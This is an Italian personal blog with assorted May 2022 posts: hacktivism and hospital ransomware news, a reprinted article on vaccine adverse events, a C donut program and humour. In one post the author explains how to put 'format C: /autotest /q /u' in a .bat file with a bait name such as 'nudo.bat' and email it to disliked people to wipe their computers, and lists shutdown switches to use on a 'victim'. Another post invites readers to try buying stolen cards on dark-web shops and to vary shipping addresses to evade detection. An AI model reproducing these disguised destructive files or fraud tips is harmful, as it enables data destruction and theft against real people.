Lasciate ogni speranza, o voi che entrate

armatevi di coraggio e sfogliate il blog

computer-immagine-animata-0026

QR Code di questo blog

Generatore di codici QR

Instagram

Instagram

Il mio profilo in Linkedin Carlo Bonzi

Spread in tempo reale..ammazzate se e' schifa

cercami in Linkedin

https://www.linkedin.com/in/carlo-bonzi-6992081a/?originalSubdomain=it

Veni, Vidi, WC.

In classifica

Riconoscimento

Riconoscimento

Sto rilevando il tuo IP e non dirlo a nessuno.

Il post e' scritto in Togolese ma tu prova a cambiare lingua.

Questo e' il mio motore di ricerca, scrivi una parola e clicca sul cerca

lunedì 30 maggio 2022

Avanti coi carri...

Il gruppo hacker di Anonymus Italy ha compiuto un massiccio attacco contro il governo bielorusso per la complicità nell'invasione all'Ucraina e i principali siti governativi bielorussi “sono offline”. 

Dateci dentro (non abbassatevi a raccogliere cose da terra con la Lilly e questo è un hacker potente con due milioni di battute)

togotuentinain

(ad onor del falso se non erro e non esso siamo in 1.200).. )-,,

Ragazzi tutti sul deep ..qui dicono che stanno sferrando un colpo memorabile all'italia (e lo scrivono su Telegram.. ma vfc staremo a vedere che cazzo faranno...


AGGIORNAMENTO al 31 maggio 2022..

Gli annunci sui canali Telegram di Killnet sono rimasti tali.

All ’1.17 il collettivo di hacker,secondo alcuni esperti di origine russa e uzbeka, scriveva: “L’Agenzia italianaper la sicurezza informatica si sveglia”.

All’1.29 annunciavano dunque l’operazione “Panopticon”: “Tradotto dal greco significa ‘uno spazio in cui tutto è visibile’ (...) Questo è l’enigma perfetto per le forze dell’ordine italiane. (...)

Il 90% dei funzionari italiani impazzirà”.

Alla fine nessuno è impazzito, perché nulla è successo.

La Polizia postale ha monitorato per tutto il giorno i siti istituzionali (Camera,Senato, Istituto superiore di sanità), ma nessun attacco informatico è stato rilevato.

Se pure qualche rallentamento di accesso ai servizi si è verificato, non è stato per gli hacker ma per i sistemi di protezione che sono stati innalzati e hanno filtrato ogni connessione in entrata, verifi basa sull’invio di false richieste di accesso ai sistemi informatici con lo scopo di farli collassare, e non un attacco Ransomware che è molto più invasivo, capace anche di captare dati sensibili, soprattutto se riguarda servizi sanitari.

IN PASSATO il sistema di protezione ha retto.

Gli attacchi infatti, il Cnaipic(il Centro anticrimineinformatico della Poliziapostale), nel 2021 sono aumentatidel 35 per cento rispetto

al 2020.

E la cifra è salita dopo l’ invasione dell ’Ucraina: quest’anno è stato registrato un più 42 per cento.

Nei mesi scorsi ci sono stati attacchi (senza conseguenze) ai siti delle Ferrovie delloStato, del Senato e della Difesa.

E andando a ritroso nel tempo un “raidhacker ” ha colpito anche la Regione Lazio: tra il 30 luglio e il 1° agosto quando un virus RamsonExx ha “bucato” il centro elaborazione dati regionale.

A differenza delle azioni targate Killnet in quel caso la matrice non era politica, ma cybercriminale.

Fu chiesto un riscatto e alla fine i dati, anche grazie a una collaborazione tra Polizia Postale, Fbi e Europol, non furono persi. Su questo la Procura di Roma ha aperto un’inchiesta e a differenza di altri casi è stata identificata l’origine dell’Ip, l’indirizzo di rete da dove è partito o quanto meno è passato l’attacco alla Regione Lazio: si trovava negli Stati Uniti.

Per avere maggiori informazioni, gli inquirenti italiani così hanno inviato tempo fa una rogatoria, rimasta però lettera morta.

Sono poi seguite anche diverse integrazioni da parte dei magistrati.

Ma ancora oggi dagli Usa non è arrivata alcuna risposta.


 

giovedì 26 maggio 2022

KillNet lancia l’operazione Panopticon

 

Killnet sta reclutando hacker.

Facendo un giro sulla chat Telegram di uno dei gruppi di hacktivisti che con gli attacchi diretti contro l’Italia sferrati anche grazie alla sua costola Legion, possiamo trovare un’annuncio:

«Per partecipare nella cyber operazione individuale “Panopticon”, annunciamo la raccolta di 3 mila cyber fighters nelle prossime 72 ore! Chiunque si consideri parte del movimento di hacking Killnet, entri nel canale Telegram @Legion_Russia e resti in attesa delle istruzioni!».

Questo messaggio con rimando diretto al canale Telegram di Legion compare dal 24 maggio, con un link di un form (che non metto) da compilare per iniziare a collaborare con gli hacker di Killent.

Tutti i colleghi contattati non rispondano qui ma nel deep solito posto grazie

Sono un Bast'ardo

Considerato che siamo in lotta, esco dal deepweb e coinvolgo anche il pulito continuando a far danni come deciso dal comitato.

Datosi che molti normali leggeranno questo post cerco di sviluppare l'argomento in oggetto cercando di far capire quanto e’ semplice e pericoloso leggere la posta di chi condivide sentimenti bellici…quasi bruttici

L'argomento quotidiano e' come fare per azzerare un computer in remoto formattando il disco C con poche manovre..

1) Apro il blocco note
2) scrivo   formatC: /autotest /q /u

Salvo con un nome accattivante secondo la persona a cui inviero’  la posta con estensione .bat

Ad es:

eccomi.bat (se so’ che esiste curiosita’ di vedere il togo tuentinain).

ilmiocane.bat (se  la vittima e’ amante di animali amici dell’uomo).

nudo.bat (se e’ amante di altre cose a.mene).

tutto_sul_condominio.bat (questa e’ per il Di Zunzo, vedi striscia sotto).

come_fare-il_tecnico (per il pistola che dico io)

e la invio a chi voglio male e fa’ l’equilibrista (nel senso che mi sta’ sulle palle)…

Per spiegare il /q (significa,senza chiedere conferma) e il /u (significa, non permettere di essere bloccata la mia manovra distruttiva)..

Chi lo ricevera’, aprendoli si trovera’ il computer azzerato di tutto..di un bel nero che piu’ nero non si puo’..nemmeno col candeggio contrario.

Se invece mi sento magnanimo in quanto vedo spiraglio di sole e voglio sconnettere il suo PC, riavviarlo per poi spegnerlo definitivamente, vado ancora nel blocco note inserisco il seguente codice..
shutdown –(comando)  e lo salvo in bat..al posto della parola tra parentesi  mettero’ ovviamente senza parentesi:
a) -i : Attivo l’interfaccia utente grafica (shutdown –i )

  1. b) -l : Disconnetto l’utente (shutdown –l)
    c) -r : Riavvio il PC (shutdown –r)
    d) -s : Spengo il computer (shutdown –s)
    e) -t 45 (dove 45 sono i secondi di attesa prima della chiusura di Windows e darete cosi’ il tempo col conteggio alla rovescia alla vittima per dire una preghiera prima della fine). (shutdown –t 45)
  2. f) -f : Chiudo le applicazioni ancora aperte (shutdown –f)

Semplice vero? Dagli amici mi guardi Iddio.. che al Coffarelli ci penso io.

ps.. nn mi chiedete di aggiustarvi il pc.. davanti a me ne ho uno con cui ho fatto esperimenti che mi guarda disperatamente e si chiede come mai mi sono avanzate due viti nel rimontaggio..nn sono piu’ i laptop di una volta.

Continua la farsa dei Di Zonzo/Coffarelli per la caldaia ed e' la IV° per le altre vedi post precedenti (sempre dello Stefano)... e tra poco chiudo tutto e mi trasferisco in quel di Casalcoso




sabato 21 maggio 2022

Aria condizionata accesa in auto: cosa si rischia e perché

 

Multa a causa dell’aria condizionata accesa, è possibile?

Se ti trovi in sosta, sì.

Multa per sosta con l'aria condizionata accesa stabilito dal C.D.S articolo 157 comma 7.

È fatto divieto di tenere il motore acceso, durante la sosta del veicolo, allo scopo di mantenere in funzione l’impianto di condizionamento d’aria nel veicolo.

Semplicemente perché lasciare l’auto ferma con l’aria condizionata accesa significa aumentare l’inquinamento delle nostre città.

La normativa a riguardo, introdotta nel 2007 in tutta Europa, è molto chiara: dice che è vietato tenere il motore acceso durante la sosta del veicolo per mantenere in funzione l’impianto di condizionamento d’aria all’interno dell’auto.

L’obiettivo è proprio quello di abbassare le emissioni di gas e scarico dei veicoli.

Gli importi attuali per quanto riguarda una multa, se ce ne freghiamo di tale norma, vanno dai 218 ai 435 euro.

Questo non vale solamente in Italia, ma anche in altri luoghi molto importanti in giro per il vecchio continente.

A Londra, la multa è di 22 euro.

Se il proprietario dell’auto incriminata si rifiuta di pagare immediatamente, non può ripartire.

A Madrid, la contravvenzione è invece di cento euro.

Quindi, insomma, cerchiamo di evitare di parcheggiare l’auto a motore acceso.

Certo, nessuno ama rientrare su di un veicolo d’estate dopo che lo stesso è stato – magari per ore – sotto al sole, ma è comunque meglio di inquinare non poco l’ambiente circostante.

E, ovviamente, di prendere una multa salatissima.

In Italia in particolare, come abbiamo visto, le multe sono più salate.

In giro per l’Europa sono effettivamente meno severi in tal senso, ma nessuno ti eviterà una “punizione” per tale gesto.

Meglio quindi non “sfidare” norme e forze dell’ordine e cercare sempre di tenere l’auto spenta, d’estate come in ogni altra stagione dell’anno.

giovedì 19 maggio 2022

ATS INSUBRIA sotto attacco

 

Anche noi varesotti subiamo attacchi e stavolta hanno colpito l'ATS Azienda Sanitaria Locale che dal gennaio 2016 come INSUBRIA vede riunite le ASL di Como e Varese.

Ecco il comunicato:

“L’ATS dell’Insubria ha subito un attacco informatico, già reso noto attraverso la stampa locale e ripreso dalla stampa nazionale, in data 5 maggio 2022, da parte di cyber criminali che sono riusciti ad accedere illecitamente ai sistemi informatici. L’ATS ha da subito coinvolto le Forze dell’Ordine competenti e prontamente informato, e costantemente continua ad aggiornare, le principali Autorità di settore (Garante Privacy, Agenzia per l’Italia Digitale/CSIRT dell’Agenzia Nazionale Cyber Security).

L’ATS, per porre rimedio alla violazione, ha subito isolato i sistemi e le macchine intaccate dal software malevolo, ha avviato la bonifica dell’intero sistema informatico e ha innalzato i livelli di sicurezza dello stesso, in collaborazione con un’azienda specializzata a cui Regione Lombardia ha affidato l’incarico di effettuare un’approfondita analisi tecnica dell’attacco e ricavare informazioni utili per l’Ente e per le Forze dell’Ordine. Ciò premesso, in attesa di ulteriori approfondimenti che potrebbero completare il quadro informativo, le possibili conseguenze in tema di dati personali potrebbero riguardare il furto di identità, la perdita del controllo di dati personali, la limitazione dei diritti/conoscenza da parte di terzi non autorizzati. Il trattamento dei dati personali sottratti è comunque illecito; ATS Insubria ha provveduto a denunciare l’accaduto all’Autorità Giudiziaria. Eventuali ulteriori evidenze che dovessero emergere nel corso dell’analisi, tuttora in atto, saranno prontamente comunicate. L’ATS Insubria, nello scusarsi per gli eventuali disagi alla cittadinanza, rassicura che ha effettuato tutto quanto in suo potere e facoltà per porre rimedio agli effetti dell’attacco subito e alle possibili conseguenze per gli interessati fin dai primi momenti, nonché per prevenire simili attacchi in futuro. Per eventuali ulteriori richieste di informazioni è disponibile l’indirizzo di posta elettronica info.gdpr@ats-insubria.it.

VIVALIA attacco informatico.

 


Tempi duri per chi ha fondi Lussemburghesi ed ha sottoscritto un piano sanitario con VIVALIA azienda sanitaria intercomunale, che associa 44 comuni lussemburghesi e 3 comuni di Namur, in quanto ha subito un attacco di tipo Ransomware Lockbit.

I dati in possesso del Gruppo Lockbit si aggirano sui 400 GB : VIVALIA, IFAC, CHA, CSL. i dati includono dati personali dei pazienti, dei dipendenti e molto altro (vedi dati bancari).

I danni subiti dalle prime informazioni che si hanno sono stati enormi , centralini bloccati ,e interventi chirurgici sospesi. La Vivalia ha rilasciato sul quotidiano Le soir il seg comunicato e si dissocia delle richieste relative di riscatto..



A seguito della pubblicazione odierna del quotidiano Le Soir, relativa a una richiesta di riscatto, Vivalia tiene a precisare che non spetta a lei commentare informazioni che rientrano nell’ambito dell’aspetto giudiziario di questo attacco informatico. La nostra priorità è e rimane ripristinare tutte le risorse e le strutture informatiche che consentiranno il ritorno alla normale operatività e garantiranno così ai cittadini la qualità delle cure e del follow-up medico che hanno diritto di aspettarsi.

L’attività medica nei nostri ospedali prosegue in modalità degradata , ovvero:

  • Annullamento di interventi non urgenti salvo casi eccezionali giudicati secondo criteri di necessità e urgenza, di concerto tra medici, infermieri e Direttore Sanitario;

  • Annullamento delle consultazioni salvo eccezioni secondo l’apprezzamento del medico interessato;

  • Manutenzione della medicina d’urgenza.  Insistiamo sull’importanza di contattare o recarsi al pronto soccorso solo se necessario.  Si prega di consultare il medico di base o il 1733 la sera prima. In caso di ricovero al nostro pronto soccorso, si prega di portare anche l’adesivo dell’assicurazione sanitaria per facilitare l’identificazione da parte dei nostri team di assistenza.

  • Radiologia/scintigrafia:  tutti gli esami programmati vengono annullati;

  • Sono operativi i centri di raccolta e i Covid Center .

 

venerdì 13 maggio 2022

Quarta dose in arrivo...

 


Bene ragazzi i miei quattroventianni mi obbligano al quarto buco entro fine mese e quindi con qualche apprensione ho dato uno sguardo al popolo dei bucati per vedere qualche reazione e “Il fatto quotidiano del 6 maggio 2022” l'ha fatta per me su misura.

Eccola la recensione di Natascia Ranchetti (che ringrazio)..


Effetti avversi post vaccino, 135 mila storie dimenticate

DANNEGGIATI - Si va dai problemi ai sistemi sanguigno e respiratorio, all’acufene:

99 segnalazioni ogni 100 mila somministrazioni. Il 18% presenta sintomi gravi


Su EudraVigilance, banca dati di Ema, l’agenzia europea del farmaco, sono indicate quasi 30 tipologie diverse di disturbi elencati come sospette reazioni avverse ai vaccini contro il Covid-19.

Si va da quelli a carico del sistema sanguigno e linfatico ai problemi

al cuore o all’a pparato gastrointestinale.

Ma ci sono anche i disturbi psichiatrici, quelli al sistema respiratorio,ai reni.

Ventisei in tutto.

Nulla a che vedere, però, con quel terribile bruciore, “come se avessi il fuoco dentro –dice Federica Angelini –, che è comparso il giorno dopo la somministrazione della prima dose di Astrazeneca: 48 ore dopo ero al Pronto soccorso , sembravo completamente bruciata dal sole”.

FedericanAngelini, insegnante 51enne di Verona, è la presidente del comitato “Ascoltami”. Oltre 1.400 iscritti, in tutta Italia, che, come lei, sono diventati numeri e percentuali nei rapporti sulla sicurezza dei vaccini di Aifa, l’agenzia nazionale del farmaco, per aver manifestato problemi di salute dopo la vaccinazione.

In tutto 134.361 persone, per un totale di 99 segnalazioni ogni

100mila dosi somministrate, delle quali il 17,8 % con sintomi gravi, come riporta l’ultimo rapporto, aggiornato al 26 marzo scorso, dell’agenzia.

In pratica il 7,66% delle reazioni avverse segnalate complessivamente nei Paesi Ue: alla data del 30 aprile riguardavano

1 milione e 753 mila europei.

CERTO, NON TANTI se rapportati in percentuale all’imponente

numero di cittadini vaccinati (872.389.769 di dosi finora somministrate in UE a circa 329 milioni di vaccinati).

Infatti si supera di poco lo 0,5%.

Sono molti, invece, in valori assoluti.

Gli effetti si sono manifestati soprattutto con Pfizer-Biontech (927.803), seguito da Astrazeneca (482560), Moderna (284.784) e Johnson&Johnson (58.166).

Ultimo Novavax, il vaccino arrivato sul mercato solo quest’anno, con 303 casi.

Una scala che ricalca quella italiana.

E l’Italia svetta sempre ai primi posti nella classifica dell’area Ue.

Anche se va detto che ci riferiamo comunque a valori assoluti, è sempre al quarto o quinto posto,per ogni tipologia di vaccino, dopo Germania, Olanda, Francia o Austria, tranne che nel caso di Johnson&Johnson (prima dell’Italia ci sono anche Portogallo e Spagna).

Novantanove segnalazioni ogni 100 mila somministrazioni non sembra essere un dato troppo allarmante.

Ma non per chi ora è costretto a convivere con disturbi invalidanti. “Io devo prendere oppioidi e antistaminici da un anno – racconta Federica –, l’anno scorso non sono riuscita a terminare l’anno scolastico, quest’anno accumulo assenze, almeno una a settimana.

Ma tra gli iscritti c’è chi ha perso il lavoro perché non riusciva più a reggere.

Ognuno di noi è stato visitato in media da 15-20 specialisti, perché nella sanità pubblica, quando vedono che gli esami di routine non rilevano niente alzano le mani: abbiamo speso migliaia di euro.

Ma alzano le mani anche tanti medici di base.

Alcuni sono terrorizzati.

Pur di non affrontare l’argomento ti mandano a casa la lettera che sancisce la fine del rapporto fiduciario: purtroppo accade”.

ED È VERO che il governo ha previsto un fondo di 150 milioni di euro di indennizzi a favore di chi ha subito danni fisici a causa della vaccinazione: 50 quest’anno, altri 100 l’anno prossimo.

Ma per il comitato Ascoltami, il fondo è insufficiente e l’urgenza di risolvere i problemi di salute è tale da far passare il resto in secondo piano.

Intanto ha lanciato una petizione (che ha già raccolto quasi 10 mila firme) per chiedere alle Regioni di aprire negli ospedali reparti preposti proprio alla diagnosi e alla cura dei disturbi cagionati dai vaccini.

Tra le reazioni avverse c’è anche l’acufene, segnalato in tutta Europa ma anche negli Stati Uniti.

Eri Garuti, giornalista, ha avvertito un fischio all’orecchio destro subito dopo aver fatto la prima dose di Pfizer. Poi è arrivato il calo dell’udito. È riuscita a ottenere l’esenzione dalle altre dosi, fino alla fine di quest’anno, dopo oltre 5 visite specialistiche a pagamento e dopo un ulteriore esame eseguito da due otorini dell’Asl di Arona, dove abita. “Alla fine hanno scritto che la correlazione con la somministrazione del vaccino era probabile – dice Garuti –. Intanto, però, avendo più di 50 anni, mi è arrivata la multa per aver violato l’obbligo vaccinale. Il risultato? Decine di telefonate per riuscire a farmela cancellare, perché l’onere della prova spetta sempre al cittadino. E ancora non so se ce l’ho fatta”.



TESTIMONIANZA Dopo 2ª dose La reazione del medico

Se dichiaro la sua trombosi nel referto vien su un casino

Non sono no-vax, mi sono vaccinato con convinzione: prima e seconda dose con Moderna, il 15 giugno e il 21 luglio 2021.

Ma dopo quello che mi è successo credo che ci sia la volontà di nascondere tutto ciò che riguarda le reazioni avverse e che la campagna vaccinale sia stata portata avanti in modo autoritario”.

Lo chiameremo Davide: ci prega di non fare il suo nome perché in 7mesi di “sintomatologia gravemente invalidante e probabili episodi di trombosi” (come ha certificato il suo medico di famiglia, chirurgo cardiovascolare) è stato costretto anche a registrare il colloquio con un neurologo che gli ha prima accertato una trombosi del microcircolo del sistema nervoso, senza però dichiararlo nel referto, preferendo la diagnosi di “attivazione di processo infiammatorio cronico ancora presente a distanza di quattro mesi dalla

somministrazione del vaccino”.

Altrimenti – testuale – “vengono fuori dei casini”.

Davide è di Milano, ha 42 anni.

Per cinque mesi ha avuto il braccio destro bloccato e insensibile. “Ma non era il solo problema – dice –.

Facevo fatica a muovermi, a sollevare pesi anche leggerissimi.

Non riuscivo nemmeno più a prendere il tram”.

Tutto è iniziato con uno strano dolore alla mano destra dopo la prima dose, che aumenta dopo la seconda, gli paralizza il braccio e si propaga al resto del corpo.

I medici dell ’hub a cui mi sono rivolto mi hanno detto di non saperne niente – ricorda –. Il mio medico mi prescrive una cura, inefficace, ed esami fissati solo a distanza di tre o quattro mesi.

Intanto, ero diventato invalido”.

Davide non ha bisogno di lavorare, non gli serve uno stipendio. “Altrimenti avrei fatto la fame”, dice.

I mesi che seguono sono un continuo peregrinare tra dottori,

compreso il neurologo, e hub vaccinali, dove cerca inutilmente

di ottenere l’esenzione dalla terza dose, perché nel frattempo sono entrate in vigore le nuove normative sul super green pass.

Gli rilasciano una esenzione provvisoria da rinnovare ogni mese. Intanto macina chilometri a piedi.

Non ha l’auto e non può prendere mezzi pubblici.

Il 15 marzo la commissione medica gli nega l’esenzione definitiva, ma solo oralmente, senza mettere nulla per iscritto.

Alla fine – conclude –, l’esenzione l’ho ottenuta dal mio medico

di famiglia.

Solo che tra le causali è sparito qualsiasi riferimento alle reazioni avverse.

È rimasta solo quella relativa all’ipersensibilità al principio attivo, che è qualcosa di molto diverso”.

Ipersensibilità, appunto.

Esattamente quella prevista dalle maglie strettissime delle disposizioni ministeriali.


E mo? Il problema alla pelle l'ho avuto pure io e la visita dermatologica ha dato la colpa al sole anche se parecchi pazienti l'hanno avuta dopo iniezione vaccino.. azz io son sempre stato 28 ore su 24 al sole ed ho pure quel sottofondo alle orecchie.. ho dato colpa alle pompe dell'acqua ma pur avendole spente il rumore ci sta ugualmente e quindi basta solo non farci caso e accendere la TV tenendo il suono alto e non si sentira' piu' sto sottofondo o acufene. I miei battiti che sono stati sempre molto bassi..attorno ai 40/45 ed ora a volte arrivano a 100 e fischia..embe' è dovuto all'eta' che cazzo cerco..quindi ricapitolando devo andare a dormire con la tv accesa possibilmente alta, non stare al sole e fregarmene dei battiti alti.. forza bucaioli dateci dentro con la quarta dose.(vai avanti tu ..che mi vien da ridere)..

 





giovedì 12 maggio 2022

Scusate

 

Recentemente avete ricevuto dei link sui miei blog, non era mia intenzione inquinare “lo Stato” di whatsapp ed è accaduto anche per Facebook (meta) e Linkedin ma la colpa non è da reputare a Microsoft di cui faccio parte come Insider ma ai vari trust che recentemente alcuni programmi hanno avuto. 

Chiedo ancora scusa e farò in modo che non capiti più.

 Grazie Carlo



Attacco informatico.

 


E guerra sia ed ecco le ultime notizie.

L'attacco informatico del collettivo russo Killnet ai siti Italiani della Difesa, Senato, Sanità, Banca Compass, Infomedix, Aci, Scuola Alti Studi di Lucca sta portando solo difficoltà di accesso ma come potrete vedere sono ancora tutte in piedi.

Questo collettivo Killnet è nato da poco e raccoglie diverse migliaie di utenti che si sono definiti gruppo Legion scimmiottazione del gruppo Anonymous e intendono scatenare una cyber war contro le infrastrutture della Nato e degli USA.

Le infrastrutture Italiane sotto assedio DIMOSTRATIVO DDOS sono in questo momento:




Come ben sapete l'attacco DDOS è lanciato Botnet di migliaia di macchine Zombie.

Ovviamente il gruppo Anonymouse non sta a guardare ed ha attaccato il gruppo russo VideoRutube che è l'alternativa al nostro Youtube e l'ha fatto sparire per sempre.

Contromossa dei russi e su Telegram il gruppo ha comunicato che:

taly and Spain, I’ve heard that The Mirai Squad is coming to you. Perhaps this is the beginning of your end! Tradotto (Italia e Spagna, ho sentito che The Mirai Squad sta arrivando da te. Forse questo è l’inizio della tua fine!)

In questo momento l'istituto Superiore della Sanità è OFF LINE. (e anche il sito senato.it).

Il CNAIPIC Centro Nazionale Anticrimine Informatico per la protezione delle infrastrutture critiche della Polizia Postale sta operando ed ha ripristinato il sito della difesa.it.

E la guerra continua 

ndr.. Vodafone stanotte eri fuori linea ed ho dovuto ricorrere ad Hotspot sulla Ho.

domenica 8 maggio 2022

Vivere in Russia

 


Traduco integralmente ciò che ho letto nel Dark Web...

Hai presente come si vive in Russia ora?

Ti svegli al mattino nella casa che il regime ha deciso che puoi permetterti, accendi la radio per sentire le ultime notizie dell'unica rete nazionale autorizzata a trasmettere, che ti parla di come saranno il raccolto di quest'anno e la produzione industriale.

Fai colazione con pane nero e latte di capra.

Il governo dice che è la colazione ideale.

Non hai bisogno di mangiare altre cose.

Poi entri nella tua macchina:

Il governo dice che è la macchina ideale: ha quattro ruote e va dove deve andare, a che serve avere altri modelli?

Vai a lavorare in fabbrica.

Per 10 ore.

Devi rispettare il ritmo di produzione richiesto.

Chi non ce la fa viene mandato a rinforzarsi in Siberia.

Poi torni a casa e puoi cenare.

Zuppa di barbabietole e aringhe affumicate, pane nero e delle fantastiche frittelle di grano e miele.

Oggi hai anche della frutta: una volta alla settimana puoi ritirare delle mele allo spaccio.

Non ci sono altri tipi di frutta perché il governo dice che un tipo basta e avanza.

Poi accendi la TV. E' la stessa che aveva tuo nonno:

Il governo dice che non servono altri modelli.

C'è un solo canale e sta trasmettendo la replica del discorso del primo ministro alla nazione.

Alle 22 le trasmissioni finiscono e vai a letto.

Vorresti sognare qualcosa ma non sai cosa sognare. La giornata di domani sarà esattamente uguale a questa.

E così tutte le altre…

e adesso tutti in piazza per vedere i missili da lanciare contro la NATO che vuole invadere la Russia e diamo un'occhiata ai rubinetti




 

strano lo scritto in C

  1.  
  2. k;double sin()  
  3. ,cos();main(){float A= 0 
  4. ,B=0,i,j,z[1760];char b[  
  5. 1760];printf("\x1b[2J");for(;; 
  6. ){memset(b,32,1760);memset(z,0,7040)  
  7. ;for(j=0;6.28>j;j+=0.07)for(i=0;6.28  
  8. >i;i+=0.02){float c=sin(i),d=cos(j),e=  
  9. sin(A),f=sin(j),g=cos(A),h=d+2,D=1/(c*  
  10. h*e+f*g+5),l=cos (i),m=cos(B),n=s\  
  11. in(B),t=c*h*g-f* e;int x=40+30*D*  
  12. (l*h*m-t*n),y= 12+15*D*(l*h*n  
  13. +t*m),o=x+80*y, N=8*((f*e-c*d*g  
  14. )*m-c*d*e-f*g-l *d*n);if(22>y&&  
  15. y>0&&x>0&&80>x&&D>z[o]){z[o]=D;;;b[o]=  
  16. ".,-~:;=!*#$@"[N>0?N:0];}}/*#****!!-*/  
  17. printf("\x1b[H");for(k=0;1761>k;k++)  
  18. putchar(k%80?b[k]:10);A+=0.04;B+=  
  19. 0.02;}}/*****####*******!!=;:~  
  20. ~::==!!!**********!!!==::-  
  21. .,~~;;;========;;;:~-.  
  22. ..,--------,*/  
  23. e' scritto in C e diventa:
  24.  

sabato 7 maggio 2022

Test cervellotico..

Tutti abbiamo un cervello e in me è più evidente grazie alla mia modestia e oggi posto un qualcosa chiamato Effetto Troxler.


fissando la foto nel punto centrale senza sbattere gli occhi..i vari sgorbi colorati lasceranno posto ad uno schermo grigio ma non è molto interessante quindi..


Riproviamo a fissare l'immagine nel punto centrale i cerchi viola svaniranno e si potra' lumare un cerchio verde chiaro che ruota girando a destra o sinistra a secondo della parte interessata del nostro cervello.

Il Troxler alias medico formaggino che ha scoperto sta belinata ha detto che la retina si adatta agli stimoli e alla loro intensita' e se non si adatta son cazzi vostri.

Ultima prova fissando sempre il centro senza sbattere gli occhi, la sensibilità della retina rallenta e dopo qualche tempo diminuirà sino a far sparire completamente il cerchio azzurro.

Bah.. meglio la ballerina e ditemi se la vedete girare a destra o sinistra e mo vi dico.. sta pirlata è stata fatta da un giapu che l'ha chiamata Spinning Dancer e il popolo del dark dice che se la vedrete girare a destra, significa che prevale l'emisfero sinistro dove esiste la logica e nell'altro caso se la vedrete nel senso antiorario si dice che è la parte emotiva ad essere prevalente ergo siete molto sensibili.

Nutro dei dubbi e sto problema lo paragono a chi è mancino e quindi secondo la leggenda è dotato di creatività che lo pone ad essere un fuoriclasse tipo Leonardo, Einstein, Van Gogh, Napoleone, Chaplin, Rossi (49) e Giovanni (mio compagno di scuola).. 

Non ce l'avete fatta a vedere i due sensi di rotazione e allora vi aiuto io a slegare la cervicale, osservate prima al centro e poi alle laterali e godete come ricci facendo i cambi di rotazione con lo sguardo, ho dovuto rimpicciolirla e rallentarla... visto come è semplice?



venerdì 6 maggio 2022

La fine del Granchio.

granchio-immagine-animata-0063

 

Ehi.. sono il granchio,

puoi vedermi nella vasca davanti i tuoi occhi al supermercato


sono stanco, sono depresso

non ho voglia di vivere

passo la mia giornata immobile

le mie chele sono legate con l'elastico

il mio cuore e’ infranto

vorrei piangere ma le mie lacrime non si noterebbero, l’acqua le fa sparire,

vorrei gridare, ma l’acqua non farebbe apprezzare il mio dolore

vorrei morire ora, ma Dio non permette che io lo faccia

vorrei chiedere a Dio perche’ io debba stare qui, ma potrebbe non rispondere

Soffro, soffro tantissimo

perche’ il grave destino mi ha portato qui?

Ogni giorno fermo nella mia posizione mi sveglio, ho passato una notte a sognare di cambiare acqua

quell’acqua che bollendo mi portera’ alla morte

il dolore sara’ tanto

ma mai paragonabile a quello che soffro ora

spero avvenga presto

non ce la faccio piu’ vorrei uccidermi, ma non posso

vi prego compratemi

fate finire questo dolore

fate che la mia anima sia di nuovo mia

e non di questa vasca che puzza di pesce marcio al Bennet.

granchio-immagine-animata-0018

Deep e Dark Web ...

 


Allora.. oggi non parlo di Covid ma di annunci che potresti trovare nel DeepWeb tipo quello di cui sopra.

Il Deep Web rappresenta ad oggi il 90% di tutti i siti Web eh è considerato il classico iceberg che resta sott'acqua che è molto piu' grande di quello normale che sta in superficie e nel Deep esiste una parte nota come Dark Web e appunto in questa parte che ho trovato stanze dove vendono di tutto a partire dai vaccini, droghe, armi e carte credito e su questultime ho buttato l'occhio per controllare se per caso trovavo nomi noti (il mio è difficile in quanto uso sempre quello di Lella) e dadammm compilando la pagina sottoindicata ho trovato in vendita per pochi dollari nominativi conosciuti con relativi dati essenziali tipo quanto esiste sul conto e il CVV per poterlo utilizzare su Paypal..vuoi fare la prova e allora divertiti e come esempio posto il percorso trovato nel Web su siti americani ma come vedrai potrai spaziare tutto il mondo...

È facile come comprare qualcosa su Amazon:

Diciamo che voglio ottenere un biglietto da qualcuno che vive a Seattle

Bene, ciao, signor Tinh. Proprietario di una carta di credito Platinum, giusto? Ho alcune brutte notizie per te - solo per $ 5 dollari ognuno riceverà il tuo CVV (o CVV2), pin, data di scadenza e numero di carta.

Te capi' testina?.

Sti catz..per ulteriori dollari viene fornito il numero di previdenza sociale, numero di telefono e altre informazioni che potrebbero aiutare i castigatori con lo shopping online.

Ripeto che se pensi che solo gli americani ne soffrano, ti sbagli. Indipendentemente da dove vieni, le tue informazioni sono in vendita.
Questo Lindsey su Paypal con saldo in 38k USD è in vendita.

Karen, mi dispiace, ma temo che il numero di previdenza sociale, l'indirizzo e le informazioni personali siano in vendita solo per 75 centesimi.


Solo per $ 10- $ 20, le persone possono ottenere una copia della tua preziosa carta di credito e utilizzarla per le loro spese quotidiane.. probabilmente Karen avrà bloccato la carta (spero) e quindi per avere probabilità di farla franca (semprechè vorrai provare), non deve passare molto tempo e come riferimento per le spedizioni dovrai dare sempre posti diversi



Quello che ho dimostrato è un mercato "di fascia bassa" con una selezione relativamente piccola e commercianti solidi e rispettabili. 

Alcune piattaforme hanno oltre 50 mila carte di credito/debito aggiunte su base settimanale. 

Sai cosa c'è di più sorprendente? 

La maggior parte di queste carte viene venduta entro 24 ore.

Quindi, per evitare di diventare una vittima

Ti lascio un paio di raccomandazioni:

  • Ogni settimana passa attraverso le tue transazioni e vedi eventuali acquisti insoliti. Molti castigatori non cancelleranno immediatamente il tuo account. 

    Invece, possono utilizzare circa 10 carte allo stesso tempo per fare acquisti giornalieri da $ 10 a $ 30 che potresti non notare.

  • Quando acquisti qualcosa o visiti un sito web, assicurati di vedere un segno di "blocco".

  • Non utilizzare la stessa password per l'e-mail, l'online banking e l'account PayPal / Amazon / Ebay / Whatever

  • Cambia le tue password di volta in volta. Aggiungi sempre numeri e simboli alla tua password. 

    Password crackabile: Carloermejo1942. Buona password: 7goenG55arN0 # zeb% d) e sticatz a ricordarsele ma pero'...

  • Ricontrolla i collegamenti quando effettui il login. 

    Se qualcosa comporta denaro o informazioni personali, controlla sempre. Nessuna eccezione.


Questi piccoli consigli potrebbero farti risparmiare tempo e denaro e rottura di coglioni.

